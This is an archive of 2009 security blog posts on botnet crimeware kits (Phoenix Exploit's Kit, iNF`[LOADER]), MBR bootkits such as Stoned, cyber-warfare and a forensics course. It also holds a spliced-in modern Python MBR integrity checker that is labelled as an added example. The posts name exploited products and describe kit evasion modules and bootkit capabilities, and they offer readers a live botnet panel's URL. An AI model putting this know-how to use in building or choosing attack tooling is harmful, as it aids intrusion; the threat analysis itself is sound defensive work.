Every distribution of a new variant's binary widens the AV response time again, adding new victims and enlarging the family. It is even more complex if we consider that the binary can be (and is) subjected to anti-analysis processes that are offered in bulk online.

Related information
Special!! ZeuS Botnet for Dummies
Fusion. A concept adopted by current crimeware
Botnet. Hardening in the new version of ZeuS
ZeuS Carding World Template. (...) the face of the botnet
Financial institutions in the sights of the Zeus botnet II
Financial institutions in the sights of the Zeus botnet I
LuckySploit, Zeus's right hand
ZeuS Botnet. Massive propagation of its trojan II
ZeuS Botnet. Massive propagation of its trojan I

Other packages to control botnets
Phoenix Exploit's Kit
Hybrid Botnet Control System
Botnet Open Source
Liberty Exploit System
TRiAD HTTP Control System
Eleonore Exploit Pack
Unique Sploits Pack
YES Exploit System

Botnet Activities
Waledac/Storm. Past and present of a latent threat
Symbiosis of current malware. Koobface
Understanding Fast-Flux networks
Danmec Bot, Fast-Flux networks and recruitment of zombie PCs

Jorge Mieres

Sunday, September 20, 2009

Computer Intelligence, Information Security and Cyber-Warfare

Undoubtedly, we are increasingly dependent on technology and computer networks, not only at home but also at much higher levels, such as business and government, where obtaining and preserving information become critical actions.

This scenario creates new challenges and, at the same time, new strategies to address them, setting the rules of a game in which technological resources, information and intelligence processes are the key pieces for ensuring business continuity (in commerce) and the operation of government and military projects at any level.

First, business environments are pouring money into new and better technologies to ensure the survival of their business and to keep their information from reaching the hands of competitors; it is jealously guarded by security schemes that seek to curb the actions of hired computer specialists, who are often engaged to perform espionage.

On the other hand, states also invest in technologies through their intelligence services (government and military), giving rise to new ways of obtaining information in a timely manner by using technical resources and various sources of information, in an intense competition in which they constantly try to get ahead of their enemies by stealing information that would reveal the (geopolitical, military and economic) plans of other nations.

This inevitably means that, from a particular point of view, those of us devoted to information security should channel some of our efforts into adding state-of-the-art methodologies to certain activities that were formerly assigned only to the intelligence services.

In this regard, government initiatives to protect technological perimeters receive special attention from various states involved in a war that is taking place in a setting many may consider new, but which isn't: the virtual one, where the strategies of the "battle" are carried out behind closed doors using something as common today as the Internet.

These confrontations aren't based on mass killing as in a conventional war, but on computing and technological aspects. Consequently, those who develop better technologies and implement them better enjoy the ability to obtain more and better information. This large-scale, unconventional form of struggle is called Cyber-Warfare.

What are we talking about? It's the use of computerized systems to carry out a war over the Internet. From this perspective, it becomes necessary to resort to Computer Intelligence (CYBINT - Cyber Intelligence).

From a broad perspective, Cyber-Warfare is no different from what Information Security specialists do in trying to devise defensive (and offensive) strategies for the safeguarding and protection of information, whether governmental or private.

Can we say, then, that those of us who dedicate ourselves to this are soldiers in a war unfolding in the virtual world? I would say so, indirectly. We are part of a virtual war that feeds on other smaller, private ones.

Since the very beginning of intelligence, information has been the spoils of war and, at the same time, the food on which it feeds daily, regardless of the methods and mechanisms used to produce it. That is obviously the reason for designing mechanisms to obtain it in a timely manner.

Strategies and tactics for virtual combat are gestated in conflict scenarios carefully planned by intelligence analysts and other figures of the secret world, who from a desk design action plans to plant rumours, run diversionary operations and propaganda campaigns, and cover up "good" matters (in the broad sense of the word) without attracting the attention of others, even through malware.

So one of the most important parts of Cyber-Warfare is Information Warfare, conducted through information technology, where the soldiers are people with extensive computer skills who risk their lives on a battlefield where their weapons are computers and their ammunition is bits.

The intelligence services know this very well and have always been involved in computing manoeuvres designed to "learn more about others" (individuals, governments, companies ...), resorting to espionage through actions that involve technological resources, such as COMINT (Communications Intelligence), and others that involve them less, such as HUMINT (Human Intelligence), but which are directly related to Information Security, among other military intelligence activities.

All these issues apply directly to the relevant conflicts of recent years, with cases such as USA and Israel, Russia and Estonia, among others, where hacktivism, computer vandalism, propaganda campaigns and psychological action strategies flood the Internet for the sole purpose of weakening the opponent.

The first question that might come to mind is: why use technology in this way? Well ... Sun Tzu put it quite excellently when no one yet spoke of it: "The enemy that operates in isolation, lacking a strategy and taking their opponents lightly will inevitably end up being defeated."

Jorge Mieres

Saturday, September 19, 2009

Phoenix Exploit's Kit. Another alternative for controlling botnets

This is another of the alternatives in the underground crimeware market. In this case, it is another web application developed in PHP and originating from Eastern Europe: Phoenix Exploit's Kit.

This package consists of nine (9) exploits:
  • IE6 MDAC
  • MS Office Snapshot
  • PDF Collab / printf / getIcon in Adobe Reader
  • IE7 MEMCOR in Internet Explorer 7, Windows XP and Windows Vista
  • FF Embed
  • Flash 9 in a vulnerable Shockwave Flash plugin
  • JAVA in JRE
  • Flash 10 in the (unspecified) versions of Flash Player
As for information processing, Phoenix allows, as is usual in most such programs, statistical data to be obtained on browser types (MSIE, Firefox, Opera, etc.), browser versions, operating systems, countries of origin of the infected machines and some more data which, taken together, constitute the normal intelligence process conducted by botmasters.

While Phoenix Exploit's Kit isn't a recent development (its first version emerged in the heyday of this type of crimeware, in 2007), it is currently traded in the underground "business" at a price of around USD 400 when purchased with a domain.

Phoenix joins the collection on offer in a criminal world that every day drives the dark machinery of underground and illegal business on the Russian crimeware market.

Related information
iNF`[LOADER]. Control of botnets, marihuana and (...) malware
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Another crimeware alternative...
The prices of Russian crimeware. Part 2
Eleonore Exploits Pack. New crimeware In-the-Wild

Jorge Mieres

Sunday, September 13, 2009

The danger of a new generation of bootkits

While rootkits and bootkits are part of the same concept and their ultimate goals remain the same, there are certain patterns that differentiate them and make the bootkit the inevitable evolution of the conventional rootkit, advancing the state of the art by adding more complex actions.

By definition, a rootkit is designed to conceal certain activities that an attacker carries out on a compromised system, and precisely this characteristic is exploited by malware writers to hide the activities of their code (manipulation of registry keys, processes, files, etc.) when infecting a system. That is, the primary objective of a rootkit is to prevent an attacker's activities from being discovered.

This represents a serious potential danger to the security of any computer system, since depending on its type a rootkit can quietly go unnoticed because it generally has the ability to run at a low level (kernel level).

Therefore, antivirus companies classify them as dangerous or even extremely dangerous; perhaps this is one of the reasons for the efforts to secure the operating system kernel.

In this regard, earlier this year (2009) we witnessed the emergence of a type of rootkit that infects the MBR (Master Boot Record) of the machine but, unlike conventional rootkits of this style, this new variant is much more harmful and aggressive. Its name is Stoned bootkit (based on the famous Stoned virus); it was developed by Peter Kleissner and presented at BlackHat 2009.

When activated from the MBR, the bootkit ensures that the infection takes hold on the machine before the operating system starts, and it can run from any storage device (USB, CD, DVD, etc.). This means that there will be no trace in the operating system (processes in memory, for example) because the bootkit makes no direct changes to it.

Despite being considered a tool for manipulating a system (like the rootkit), as its name suggests (boot sector toolkit), it can without doubt be used for malicious purposes, and taking into account that Stoned Bootkit is designed to work on Windows 7 regardless of architecture (32-bit or 64-bit), it may represent the most exploited malicious code during 2010.

Related information
Multi-platform bootkit on the attack...

Jorge Mieres

Saturday, September 12, 2009

BootkitAnalytics: Under review status

Thanks to the BootkitAnalytics team, Vipin Kumar, Peter Kleissner and Anushree Reddy, we are at the editing stage. The final release should be out in about 10-20 days tops.


iNF`[LOADER]. Control of botnets, marihuana, and spreading malware

This is another of the many alternatives that exist among web applications designed to function as command and control panels for botnets via the web (C&C).

This new example, how could it be otherwise, is of Russian origin and, judging by the favicon and the image displayed in the upper left corner, perhaps its creator admires marihuana and, why not, may be a Bob Marley fan :-)

Below is a capture of the iNF`[LOADER] administration panel; if you want to see another active one that can be accessed ... better write me an email and I'll pass you the URL :-)

While this web application isn't new, since its first version dates from 2007, and its author has updated it once a year (the current version is 3, and the latest is the one we see in the capture), it has hardly been seen within the crimeware underground environment.

At first it was associated with the spread of a known rootkit called Goldun; however, it should be borne in mind that regardless of the malware the kit brings by default, these applications are designed to exploit any vulnerability and disseminate any type of malware.

Among its modules, it has one designed to try to bypass antivirus and firewall programs, a self-destruction module with which the information can be removed from some or all of the zombies in its network, and a zombie statistics system broken down by country, among others.

As we see, the functionality offered by this threat isn't competitive compared to others on the market, which are available at low cost and may even come as a combo, although its own cost doesn't exceed USD 100 now.

Still, this doesn't constitute a serious threat, regardless of the interface of its administration control panel, and if it has any strength it is because it has at its command a good number of zombies that make the botmaster's activity a profitable "job".

Related information
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Another crimeware alternative...
The prices of Russian crimeware. Part 2
Eleonore Exploits Pack. New crimeware In-the-Wild
Special!! ZeuS Botnet for Dummies

Jorge Mieres

Sunday, September 6, 2009

ICFE Course

ICFE CG will be organising a 1-Day Masterclass on "Understanding Cyber Crime and introduction to Digital Forensics", on 19 November 2009 in Parkroyal Hotel, Kuala Lumpur, Malaysia.


Course Introduction:

Forensics is the application of science and technology to civil and criminal legal investigations. While most forensics programs focus on the traditional approaches — fingerprints, DNA, photography — the CSI World Headquarters inauguration program targets cyberforensics — forensic analysis and procedures of the new millennium.
The CSI-CyberForensics program focuses on the basics of computer forensics with an emphasis on the legal aspects and techniques for such investigation.

There is a whole new science to collecting evidence and ensuring it will be admissible in a court of law. In the computer age, systemic risk investigators must learn to catch someone who has committed a crime when the evidence is most likely to be found on that suspect's computer, PDA, cell phone, MP3 player, or other digital device. It's often highly sensitive data that, if mishandled, can be corrupted and lost forever.

Because computer-aided systemic risk and identity theft are on the rise with no end in sight, computer forensics training is essential for the modern systemic risk investigator. In America, the FBI sponsors the Regional Computer Forensics Laboratories (RCFLs) staffed by local, state and federal law enforcement personnel to meet this very pressing need. In this first CSI World Headquarters Malaysian Chapter inauguration meeting, CSI instructors will share their knowledge with the registered participants on this very interesting and exciting tool in cybercrime investigation.

You can expect more computer forensics labs to start appearing around the world, as digital experts continue to emerge and branch out. The career prospect in this specialized field is just beginning to be realized. This is an opportunity to be a Certified System Investigator and a chance to be ahead of the market place in the world of digital forensics and cybercrime investigation.



Bootkit multi-platform attack. Is the resurrection of the boot viruses?

As many know, in the world of malicious code there is an extensive nomenclature for referring to each of the malicious programs roaming around the big network, adopted according to the characteristics and purpose for which each was designed, with the English terms being the most widely accepted. Some direct translations are even ugly ;P

In this connection, you may have read about a new name that has been making a lot of noise since the last BlackHat: Bootkit. But ... what is it?

A bootkit is basically a type of rootkit designed to infect the boot sector of Windows operating systems, commonly known as the Master Boot Records (MBR).

While the rootkit concept dates back almost to the very beginning of UNIX platforms and malicious code that abuses this technique isn't new, we could say that the concept of a bootkit refers to a new family of malware developed to circumvent any threat detection system by hosting its harmful instructions in the boot sector.
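Since a bootkit (as described here and in the Stoned bootkit post above) lives in the 512-byte MBR and leaves the running operating system untouched, the practical defender's check is an integrity baseline of that sector rather than an in-OS scan. The following is an added example, not code from the original post or from any of the bootkits discussed: it parses the classic MBR layout, verifies the 0x55AA signature, decodes the partition table, and compares a SHA-256 of the 440-byte boot code region against a baseline recorded on a known-clean machine. The two sample sectors are constructed inline for the demo; the "hooked" one keeps the partition table and signature intact and replaces only the boot code, which is what makes an MBR bootkit invisible to a normal boot.

```python
"""Baseline integrity check for the 512-byte MBR that bootkits overwrite.

Added example (not from the original post).  An MBR bootkit replaces the
boot code in bytes 0..439 of sector 0 and leaves the partition table and
the 0x55AA signature alone so the machine still boots normally.  Recording
a hash of the boot code on a clean host lets a defender detect that swap.
The sample sectors below are constructed for the demo; on a real host the
sector would be read from the raw disk device instead.
"""
import hashlib
import struct
from dataclasses import dataclass
from typing import List

MBR_SIZE = 512
BOOT_CODE_LEN = 440          # bytes 0..439: boot loader code
PART_TABLE_OFF = 446         # bytes 446..509: four 16-byte partition entries
MBR_SIGNATURE = b"\x55\xaa"  # bytes 510..511: boot signature


@dataclass
class Partition:
    bootable: bool
    type_id: int
    lba_start: int
    sectors: int


def parse_partitions(mbr: bytes) -> List[Partition]:
    """Decode the four primary partition entries of a classic MBR.

    Entry layout: status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) size(4).
    """
    parts = []
    for i in range(4):
        entry = mbr[PART_TABLE_OFF + 16 * i: PART_TABLE_OFF + 16 * (i + 1)]
        status, type_id, lba_start, sectors = struct.unpack("<B3xB3xII", entry)
        if type_id == 0:
            continue  # empty slot
        parts.append(Partition(bootable=(status == 0x80), type_id=type_id,
                               lba_start=lba_start, sectors=sectors))
    return parts


def boot_code_digest(mbr: bytes) -> str:
    """SHA-256 of the boot code region only (the part a bootkit replaces)."""
    return hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest()


def check_mbr(mbr: bytes, baseline_digest: str) -> dict:
    """Return findings: signature validity, partition table, and whether the
    boot code differs from the recorded clean baseline (the bootkit indicator)."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    return {
        "signature_ok": mbr[510:512] == MBR_SIGNATURE,
        "partitions": parse_partitions(mbr),
        "boot_code_changed": boot_code_digest(mbr) != baseline_digest,
    }


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample sector: given boot code, a 4-byte disk signature,
    one bootable NTFS (type 0x07) partition at LBA 2048 of 204800 sectors,
    three empty entries, and a valid 0x55AA signature."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    disk_sig = b"\x12\x34\x56\x78" + b"\x00\x00"   # bytes 440..445
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x21\x00", 0x07,
                        b"\xfe\xff\xff", 2048, 204800)
    table = entry + b"\x00" * 48
    return code + disk_sig + table + MBR_SIGNATURE


# Constructed "clean" sector and the baseline recorded from it.
CLEAN_MBR = build_sample_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 20)
BASELINE = boot_code_digest(CLEAN_MBR)

# Constructed "hooked" sector: boot code replaced, partition table and
# signature identical, as an MBR bootkit would leave them.
HOOKED_MBR = build_sample_mbr(b"\xeb\x1e\x90" + b"\xcc" * 40)

if __name__ == "__main__":
    for name, sector in (("clean", CLEAN_MBR), ("hooked", HOOKED_MBR)):
        result = check_mbr(sector, BASELINE)
        print(name, "signature_ok=%s boot_code_changed=%s partitions=%s" % (
            result["signature_ok"], result["boot_code_changed"], result["partitions"]))
```

The point of hashing only the boot code region is that the partition table and disk signature legitimately change when volumes are resized or re-imaged, whereas the boot loader code on a given installation should not; a digest over the whole sector would produce false alarms, and a digest over the table alone would miss exactly the region a bootkit targets. The baseline must be captured on a machine known to be clean, ideally from offline media, since a bootkit that is already resident can filter what the running OS reads from the disk.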

In fact there are several names that have made noise throughout history:
  • Stoned in 1987 (it was taken as the basis for the development of Michelangelo), which showed different messages on the screen.
  • BootRoot, first presented in 2005 at BlackHat and designed to run on Windows XP.
  • Kon-Boot, which bypasses the Windows authentication scheme, skipping the authentication process.
  • Vbootkit in 2007, which runs on Windows Vista; its second version appeared this year, designed to run on Windows 7 (including 64-bit). Both versions were presented at BlackHat.
  • MebRoot, whose first version appeared in 2007, is designed to steal banking details; its nature is shown in a screenshot presented in the paper "Now Your Computer is Stoned (... Again!). The Rise of MBR Rootkits", jointly developed by Symantec and F-Secure, showing its evolution.
  • Stoned Bootkit, also presented at BlackHat this year. It's multiplatform!
The two versions of Vbootkit are considered proofs of concept (PoC); however, like any proof of concept, they ended up triggering a new mode of attack by malware, and the second version (prepared for Windows 7) may be a serious threat next year.

Now ... where is the most important point in all this? I think Mebroot marked the turning point, adding to the illicit sphere a new methodology together with a concept directly related to crime, in terms of using malware attacks that seek not only information that can be exploited, even for intelligence or espionage, but also to fuel the economy of its developers; and this continues with Vbootkit v2, now prepared to exploit Windows 7.

In this scenario, the matter is serious, since it is evidence of the increasingly complete professionalization of malware developers.

Stoned bootkit is also designed to bypass the security structures offered by products such as TrueCrypt that encrypt an entire drive volume, constituting a direct attack on TrueCrypt. That is, it has the ability to infect a computer even when encrypted, gaining access to the entire system regardless of the security precautions around credentials with administrative permissions.

Ironically, the author uses a message similar to the one the old Stoned displayed (Your PC is now Stoned!), shown each time you boot your system:

Your PC is now Stoned! ... again

Also, unlike other rootkits that infect the boot sector of a specific operating system, the new Stoned has the ability to infect all versions from Windows XP to the highly anticipated Windows 7.

Given this, it may become an essential module for malware writers seeking to break the security barriers of Windows 7.

Despite the absence of a significant amount of malicious code with these characteristics (bootkits), every time one appears it makes noise in the community. Are we talking about a resurrection? I think not. Especially after trying something I did not think possible at present: the 1987 Stoned still runs on Windows Vista.

Jorge Mieres